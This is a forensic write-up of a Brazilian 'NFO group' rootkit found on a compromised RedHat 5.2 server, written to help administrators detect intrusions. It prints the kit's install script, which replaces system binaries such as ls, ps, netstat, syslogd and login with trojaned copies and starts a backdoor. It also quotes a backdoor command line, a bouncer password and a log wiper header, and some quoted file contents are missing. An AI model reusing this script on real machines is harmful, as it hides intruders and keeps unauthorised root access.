Last modified: 08/03/2000
This kit I'm about to analyze is a root- / hackingkit that was found on a compromised machine running RedHat 5.2 and was probably rooted using a rootexploit exploiting the POP2 daemon (version 4.46).
If you have any more information or insights, please send us a note at email@example.com.
The dir where this kit was found was /usr/include/rpc/".. " They installed a few backdoors and trojans into the system that gives them root access and hides theirselfs.. These are the files that were found in the directory I mentioned before.
slimsheet:~/nfo# ls -al
drwxr-xr-x 9 root root 4096 Dec 31 23:31 kit2/
-rw-r--r-- 1 root root 459397 Oct 27 14:35 kit_OUT_99.tgz
-rwxr-xr-x 1 ftp 50 13766 Nov 21 21:36 t666*
-rwxr-xr-x 1 root root 106096 Nov 20 05:26 wget*
slimsheet:~/nfo# ls -al kit2/
-rwxr-xr-x 1 root root 13762 Dec 10 20:55 admbind*
drwxr-xr-x 2 root root 4096 Sep 29 18:32 bd/
drwxr-xr-x 2 root root 4096 Jan 2 22:23 bnc/
-rwxr-xr-x 1 root root 1059 Oct 3 01:49 install*
drwxr-xr-x 2 root root 4096 Sep 29 18:32 pty/
-rw-r--r-- 1 root root 1 Dec 31 23:32 readme
drwxr-xr-x 2 root root 4096 Dec 5 21:44 resetlog/
drwxr-xr-x 2 root root 4096 Dec 31 23:30 scans/
drwxr-xr-x 2 root root 4096 Sep 29 18:32 sniff/
drwxr-xr-x 2 root root 4096 Sep 30 16:21 trojans/
3 files were found in the directory, their names were kit_OUT_99.tgz, t666 & wget. The file kit_OUT_99.tgz was the original ziped kit that put itself into ./kit2/ when you untar'ed it. wget is used to receive files from other servers at Internet. t666 is a bind/named remote exploit for mostly every OS out there, it exploits the bind 8.2.(X) version. If we enter the directory kit2 we'll find 3 more files in the same directory, admbind, install & readme. Admbind is what I believe a remote exploit for the bind version. The readme file is where the sniffer ./sniff/lins logs all connections but this file was on 0 kb. The Install file is a /bin/sh shell script that looks like this :
echo "Instalacao do Kit NFO GROUP v1.5"
if [ "$1" != "-install" ]; then
echo "Use: ./install -install" ; echo ""
echo -n "[*] Iniciando Backup..."
/bin/cp /bin/ls /usr/doc/.sl
/bin/cp /bin/ps /usr/doc/.sp
/bin/cp /bin/netstat /usr/doc/.statnet
/bin/cp /usr/sbin/syslogd /usr/doc/.logdsys
/bin/cp /usr/sbin/tcpd /usr/doc/.dpct
/bin/cp /sbin/ifconfig /usr/doc/.gifnocfi
/bin/cp /usr/bin/find /usr/doc/.dnif
/bin/cp /bin/login /usr/doc/.nigol
echo -n "[*] Iniciando instalacao..."
/bin/cp -f trojans/ls.trj /bin/ls
/bin/cp -f trojans/ps.trj /bin/ps
/bin/cp -f trojans/netstat.trj /bin/netstat
/bin/cp -f trojans/syslogd.trj /usr/sbin/syslogd
/bin/cp -f trojans/tcpd.trj /usr/sbin/tcpd
/bin/cp -f trojans/ifconfig.trj /sbin/ifconfig
/bin/cp -f trojans/find.trj /usr/bin/find
/bin/cp -f trojans/login.trj /bin/login
/bin/cp -f pty/pty* /dev/
echo -n "[*] Instalando backdoor..."
./bd/biba 14789632159 lal
echo -n "[*] Sniffando..."
echo "Instalacao completa :-)"
and if you do :
# ./biba 31337 syslogd
If we change directory to ./bnc/ we'll find a normal precompiled bouncer for IRC use and a file called bnc.conf which is the config file that are used by the binary "bnc". If we do a simple "cat bnc.conf" we'll receive the following :
pt:54123 <----- This is the port the bouncer will listen for connections on.
ps:ziggylinda <----- This is the password you need to enter to use the bouncer.
mu:3 <----- This is the "Max User" selection, this means only 3 connections at the time.
dp:6667 <----- Default IRC port to connect to is 6667 in this case.
The next file is ptyq and is the hiding file for netstat. It will remove tcp/udp/sockets from or to specified addresses, uids and ports. If we cat it it will look like :
5 /usr/include/rpc/".. "/kit/
type 0: hide uid
type 1: hide local address
type 2: hide remote address
type 3: hide local port
type 4: hide remote port
type 5: hide UNIX socket path
With this we see that the attackers wan't to hide all connections from 200.241-244 and the domains libnet.com.br, expert.com.br, amazonline.com.br, interconect.com.br. Probably these are ISPs and it will be much easier to look for suspicious connections when we know from what domains they may come.
The next file is ptyr. Every name in this file will be hidden from ls / du. If we cat ptyr we'll get the following :
Next and last file is ptys and will hide the addresses in the file from syslogd. The contents of ptys were :
If we enter the directory resetlog we'll see 6 files. I won't display any files here as they are mainly large & are made to clean logs. If I do "head -n 5 sadan" we would receive the following :
# [-] Sadan del log v 5.0 - BETA
# [-] written by the_sphinx to NFO group '99
# [-] firstname.lastname@example.org
echo; echo ; echo "[S] SADAN del log 4.0 - PORTUGUES"
echo "[S] sysdenial - email@example.com"
echo "[S] NFO Group OwnZ - Brazil - Out/99"
The next directory we enter is a directory called scans and it's from this dir all the network scans have been made. When we found this kit there were only two files in this directory, rpcscan & z0ne. z0ne is a tool to gather ips from a top domain, eg. to gather all ips of *.edu. In the directory resetlog we found a file called .logs which was a simple "find / -name *log* > .logs and in this file we found the following entries :
The next directory was called sniff and included two files, lins which was a Ethernet Packet sniffer which default logging file was ./readme. There were also a file called promisc which is a public software being used to find sniffers at all Network interfaces, eth0, eth1, etc, etc.
As you see in the file called "install" that I showed at the beginning these files are replacements for the original binaries. Notice that these are trojaned ONCE!
Network detection of this intrusion
The detection of this intrusion was fairly easy but it shows that a skilled administrator knows what's happening on his machine. The Administrator found a application named "bnc" running as uid=0 (root) and he simply did "find / -name *bnc*" and found that secret directory I mentioned before,He noticed that he had been compromised and handled it very well.
I hope this analysis will help administrators in the future to detect intrusion on their networks and I hope they realized that it's not hard for hackers to hide theirselfs in a compromised system. This is only a simple example but I hope it will help.
As usuall, a compromise like this would easily been detected on a host running file-scanning software such as tripwire. But this just shows us that there are skilled administrators out there and I'm happy to see such a thing. I also wan't you to notice that I only pasted parts of the files from the rootkit, this hacking- / rootkit have been sent to SANS and they will publish it if they feel like it's necessary.